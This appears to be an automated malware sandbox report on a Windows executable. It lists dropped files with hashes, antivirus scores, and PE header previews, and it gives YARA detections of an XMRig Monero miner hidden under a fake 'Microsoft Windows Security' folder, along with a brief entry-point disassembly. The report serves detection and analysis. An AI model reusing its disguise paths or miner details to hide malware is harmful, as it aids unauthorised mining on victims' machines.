                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5536256
                                                                                                                                                                                                                                              Entropy (8bit):6.689058470432344
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                                                                                                                                                                              MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                                                                                                                                                                              SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                                                                                                                                                                              SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                                                                                                                                                                              SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: unknown
                                                                                                                                                                                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Florian Roth
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):14544
                                                                                                                                                                                                                                              Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\2688734187.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5827584
                                                                                                                                                                                                                                              Entropy (8bit):7.718261688436852
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                                                                              MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                                                              SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                                                                              SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                                                                              SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4080
                                                                                                                                                                                                                                              Entropy (8bit):4.776282372092237
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:V9lxpje1/XGuiCk3jc5LdxJvxLWNpvoS7Noz2xGMl/Ug4sd8n:9eWCkTc5xkJRoni4Pn
                                                                                                                                                                                                                                              MD5:E1C03C3B3D89CE0980AD536A43035195
                                                                                                                                                                                                                                              SHA1:34372B2BFE251EE880857D50C40378DC19DB57A7
                                                                                                                                                                                                                                              SHA-256:D2F3A053063B8BB6F66CEE3E222B610321FA4E1611FC2FAF6129C64D504D7415
                                                                                                                                                                                                                                              SHA-512:6EA0233DF4A093655387DAE11E935FB410E704E742DBCF085C403630E6B034671C5235AF15C21DFBB614E2A409D412A74A0B4EF7386D0ABFFFA1990D0F611C70
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.................TQ....Y,......f.a......8.R.......R.....q.M...._;.......py;....-..*......|....../.'....m.o.....M........Y.......r......^.D8......g.....\|.........V.....#......../.......%......6......~}....Y........L........9G......I....{......................#@......{E/....................^..8....f.P....M,.%....[]........e8.......]..............c......._.....Z..*....f..T....f.......Z..R......l......l\......A:..............~.....%x.........1.....e......Y.......M.w....u.......R.xJ....-.h.......cw......................pR......[W............y.V...._;.......z......_9......U.......^.Ez.....[/=....&......_.W.....]..(....R..A...._:....................................Z..{.......E.....6......|m0.............Z..S....[z.v.....Qf............m......Z..H.......$......f.......'....Z..}....................pB......a......F5.....................{.....].V.....V>.C......,#....Z..$.....y~W....N&................r....N%.......#P.......".......=.......Z......z.............Z..e....^.,G....
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                                              Entropy (8bit):4.299206637643093
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:IECqOEmWfd+WQF8y/9026ZTyaRsCDusBqD5dooi8lxSD6VJSRrI:tCNL6seqD5S4SWVARs
                                                                                                                                                                                                                                              MD5:D8E2D26C33A4640B5DB3EEBE8E3FB546
                                                                                                                                                                                                                                              SHA1:6A310BD578D24548B3CE2599DAA3FF47F6D1CEEA
                                                                                                                                                                                                                                              SHA-256:65EB19063440F2EB458026797C23BA49624D724BE5BCB1DD49BE9579E81BEBB0
                                                                                                                                                                                                                                              SHA-512:1B5E4945E6C7B085EC20C70A9B20234003BDD1B4E058B0E7661CB9A23CC73926D8168B200F2240FAD7F24233591FC2EB3B35FF82B48B876A8392DC86CA93BA84
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..@3G..............................................................................................................................................................................................................................................................................................................................................w..t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\896429707.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):80896
                                                                                                                                                                                                                                              Entropy (8bit):6.424014659383267
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                                                                                                                                                                                              MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                                                                                                                                              SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                                                                                                                                                                                              SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                                                                                                                                                                                              SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):4.780506037010215
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:f5TWdT5EAc.exe
                                                                                                                                                                                                                                              File size:476'995 bytes
                                                                                                                                                                                                                                              MD5:001c8845e2489435657b200199b369f8
                                                                                                                                                                                                                                              SHA1:1891627447cdb5bdcb50e39987084d112923a155
                                                                                                                                                                                                                                              SHA256:b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276
                                                                                                                                                                                                                                              SHA512:cfe52ed2f55b3129326a93c724fa771f5085e55ac93f9ce9ac2bbff19f4f2c962177698aecc880ffefd07a3cc0b8ae32fc5facf430720ea490a6b3bae41ac30d
                                                                                                                                                                                                                                              SSDEEP:3072:/weqOYEUXPnOFWKdWuP/sB76OFftW+vX9IR3:oEUX7yQJNYEC
                                                                                                                                                                                                                                              TLSH:93A47024E3687817CBE398F2BD91744CD41F9F88B7C04D0E9364BB1A34E299764D19AE
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L........................p.......B....c....
                                                                                                                                                                                                                                              Icon Hash:31234541e14d4d49
                                                                                                                                                                                                                                              Entrypoint:0x4a3c000
                                                                                                                                                                                                                                              Entrypoint Section:.zero
                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0xDEAD [Thu Jan 1 15:50:05 1970 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:32f3282581436269b3a75b6675fe3e08
                                                                                                                                                                                                                                              Signature Valid:
                                                                                                                                                                                                                                              Signature Issuer:
                                                                                                                                                                                                                                              Signature Validation Error:
                                                                                                                                                                                                                                              Error Number:
                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                  Version:
                                                                                                                                                                                                                                                  Thumbprint MD5:
                                                                                                                                                                                                                                                  Thumbprint SHA-1:
                                                                                                                                                                                                                                                  Thumbprint SHA-256:
                                                                                                                                                                                                                                                  Serial:
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  sub esp, 00000978h
                                                                                                                                                                                                                                                  call 00007F1374BDFC97h
                                                                                                                                                                                                                                                  mov dword ptr [ebp-0000023Ch], eax
                                                                                                                                                                                                                                                  cmp dword ptr [ebp-0000023Ch], 00000000h
                                                                                                                                                                                                                                                  jne 00007F1374BDEFD7h
                                                                                                                                                                                                                                                  jmp 00007F1374BDF71Eh
                                                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                                  push 9B102E2Dh
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-0000023Ch]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  call 00007F1374BDFA1Eh
                                                                                                                                                                                                                                                  add esp, 10h
                                                                                                                                                                                                                                                  mov dword ptr [ebp-0000073Ch], eax
                                                                                                                                                                                                                                                  cmp dword ptr [ebp-0000073Ch], 00000000h
                                                                                                                                                                                                                                                  jne 00007F1374BDEFD7h
                                                                                                                                                                                                                                                  jmp 00007F1374BDF6F2h
                                                                                                                                                                                                                                                  mov ecx, dword ptr [ebp-0000073Ch]
                                                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                                  push 526E0DCDh
                                                                                                                                                                                                                                                  mov edx, dword ptr [ebp-0000023Ch]
                                                                                                                                                                                                                                                  push edx
                                                                                                                                                                                                                                                  call 00007F1374BDF9EDh
                                                                                                                                                                                                                                                  add esp, 10h
                                                                                                                                                                                                                                                  mov dword ptr [ebp-000006A8h], eax
                                                                                                                                                                                                                                                  cmp dword ptr [ebp-000006A8h], 00000000h
                                                                                                                                                                                                                                                  jne 00007F1374BDEFD7h
                                                                                                                                                                                                                                                  jmp 00007F1374BDF6C1h
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-0000073Ch]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                                  push C4B4A94Dh
                                                                                                                                                                                                                                                  mov ecx, dword ptr [ebp-0000023Ch]
                                                                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                                                                  call 00007F1374BDF9BCh
                                                                                                                                                                                                                                                  add esp, 10h
                                                                                                                                                                                                                                                  mov dword ptr [ebp-0000076Ch], eax
                                                                                                                                                                                                                                                  cmp dword ptr [ebp-0000076Ch], 00000000h
                                                                                                                                                                                                                                                  jne 00007F1374BDEFD7h
                                                                                                                                                                                                                                                  jmp 00007F1374BDF690h
                                                                                                                                                                                                                                                  mov edx, 00000025h
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000768h], dx
                                                                                                                                                                                                                                                  mov eax, 00000061h
                                                                                                                                                                                                                                                  mov word ptr [ebp-00000766h], ax
                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b640xb4.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x45dc0000x5ec48.rsrc
